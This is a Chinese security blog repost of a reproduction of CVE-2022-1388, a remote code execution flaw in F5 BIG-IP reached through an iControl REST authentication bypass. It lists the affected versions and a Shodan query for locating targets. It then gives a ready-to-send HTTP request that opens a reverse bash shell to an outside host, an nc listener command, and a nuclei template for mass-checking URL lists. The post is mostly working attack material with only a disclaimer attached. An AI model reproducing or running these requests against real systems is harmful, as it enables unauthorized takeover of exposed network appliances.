CVE-2022-1388 F5 BIG-IP RCE

036510

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 CVE-2022-1388 F5 BIG-IP RCE

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。漏洞存在于iControl REST组件中,未经身份验证的攻击者可以发送请求绕过BIG-IP中的iControl REST认证,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。

图片[1]-CVE-2022-1388 F5 BIG-IP RCE-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

漏洞影响:

  • BIG-IP 16.x: 16.1.0 – 16.1.2
  • BIG-IP 15.x: 15.1.0 – 15.1.5
  • BIG-IP 14.x: 14.1.0 – 14.1.4
  • BIG-IP 13.x: 13.1.0 – 13.1.4
  • BIG-IP 12.x: 12.1.0 – 12.1.6
  • BIG-IP 11.x: 11.6.1 – 11.6.5
  • shodan:http.title:”BIG-IP®-+Redirect” +”Server”

1.执行反弹shell命令

POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Content-Length: 85
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0a
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46xxxxx=

{"command":"run",
"utilCmdArgs":"-c 'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'"}
图片[2]-CVE-2022-1388 F5 BIG-IP RCE-渗透云记 - 专注于网络安全与技术分享

3. nc监听得到shell

nc -lnvp 7777

4.使用nuclei批量验证1.txt文件中的url是否存在该漏洞,显示存在漏洞。(nuclei稳定快,编写poc简单,有社区维护,推荐使用)

nuclei下载地址:http://github.com/projectdiscovery/nuclei


批量验证命令:
nuclei -list 1.txt -t CVE-2022-1388.yaml

yaml POC:
id: CVE-2022-1388

info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE
  author: dwisiswant0
  severity: critical
  description: |
    This vulnerability may allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
    port and/or self IP addresses to execute arbitrary system commands,
    create or delete files, or disable services. There is no data plane
    exposure; this is a control plane issue only.
  reference:
    - http://twitter.com/GossiTheDog/status/1523566937414193153
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  tags: cve

variables:
  auth: "admin:"

requests:
  - raw:
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
          "command": "run",
          "utilCmdArgs": "-c 'echo ryaqkj'"
        }

    matchers:
      - type: word
        words:
          - "commandResult"
          - "ryaqkj"
        condition: and
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载! 本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END
漏洞复现
# cve# CVE-2022-1388# F5 BIG-IP RCE
喜欢就支持一下吧
点赞10 分享
云记的头像-渗透云记 - 专注于网络安全与技术分享
详解docker-compose速度太慢解决方式_docker-渗透云记 - 专注于网络安全与技术分享
详解docker-compose速度太慢解决方式_docker
详解docker-compose速度太慢解决方式_docker
2023年3月4日 20:40 826
Nginx 根据URL带的参数转发的实现_nginx-渗透云记 - 专注于网络安全与技术分享
Nginx 根据URL带的参数转发的实现_nginx
Nginx 根据URL带的参数转发的实现_nginx
2023年5月30日 20:39 785
新版ubuntu20.04 使用root用户登录系统的详细教程_Linux-渗透云记 - 专注于网络安全与技术分享
新版ubuntu20.04 使用root用户登录系统的详细教程_Linux
新版ubuntu20.04 使用root用户登录系统的详细教程_Linux
2023年7月5日 21:00 768
在Docker中使用Redis的步骤详解_docker-渗透云记 - 专注于网络安全与技术分享
在Docker中使用Redis的步骤详解_docker
在Docker中使用Redis的步骤详解_docker
2023年7月31日 20:23 742
Linux 下如何检查内存使用率_Linux-渗透云记 - 专注于网络安全与技术分享
Linux 下如何检查内存使用率_Linux
Linux 下如何检查内存使用率_Linux
2023年6月12日 20:43 724
修改ubuntu 18.04的sources.list源为阿里或清华镜像的方法_Linux-渗透云记 - 专注于网络安全与技术分享
修改ubuntu 18.04的sources.list源为阿里或清华镜像的方法_Linux
修改ubuntu 18.04的sources.list源为阿里或清华镜像的方法_Linux
2023年7月7日 21:02 713
相关推荐
Goby 2.0.5 Beta红队版 包含1288POC-渗透云记 - 专注于网络安全与技术分享
Goby 2.0.5 Beta红队版 包含1288POC
Goby 2.0.5 Beta红队版 包含1288POC
2022年9月26日 13:36 9726
HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞-渗透云记 - 专注于网络安全与技术分享
HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
2023年1月30日 21:38 1780
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞-渗透云记 - 专注于网络安全与技术分享
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
2023年6月27日 23:14 1483
2023最新金山wps恶意文件执行复现,附poc-渗透云记 - 专注于网络安全与技术分享
2023最新金山wps恶意文件执行复现,附poc
2023最新金山wps恶意文件执行复现,附poc
2023年8月11日 15:50 1209
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞-渗透云记 - 专注于网络安全与技术分享
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
2023年11月1日 19:51 775
用友 NC NCFindWeb 任意文件读取漏洞-渗透云记 - 专注于网络安全与技术分享
用友 NC NCFindWeb 任意文件读取漏洞
用友 NC NCFindWeb 任意文件读取漏洞
2023年1月31日 17:39 767
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

热门文章
利用腾讯云函数实现快速搭建socks5代理-渗透云记 - 专注于网络安全与技术分享
9W+人已阅读
利用腾讯云函数实现快速搭建socks5代理
TOP1
命令执行后利用之WebShell文件落地-渗透云记 - 专注于网络安全与技术分享
命令执行后利用之WebShell文件落地
2024年2月18日 12:487.6W+人已阅读
TOP2
针对微信小程序的渗透测试(小程序修复&&动态调试)-渗透云记 - 专注于网络安全与技术分享
针对微信小程序的渗透测试(小程序修复&&动态调试)
2024年1月11日 16:577W+人已阅读
TOP3
【安卓渗透】JEB安卓动态调试(附安装教程及demo演示)-渗透云记 - 专注于网络安全与技术分享
【安卓渗透】JEB安卓动态调试(附安装教程及demo演示)
2024年1月17日 18:266.9W+人已阅读
TOP4
【云安全】关于云上攻防AccessKey标识特征整理(附实战案例2篇)-渗透云记 - 专注于网络安全与技术分享
【云安全】关于云上攻防AccessKey标识特征整理(附实战案例2篇)
2024年1月23日 20:035.7W+人已阅读
TOP5
关于渗透测试与红队攻防演练那些事——打点过程-渗透云记 - 专注于网络安全与技术分享
关于渗透测试与红队攻防演练那些事——打点过程
2023年11月27日 17:264.6W+人已阅读
TOP6
标签云
龙年快乐齐治堡垒机齐治黑屏黑客攻击黑客高级高版本java没有jre高效高危漏洞骑士cms任意代码验证码绕过验证码爆破验证码接收验证码验证风起陇西题库项及页面
!
也想出现在这里? 联系我们
创意广告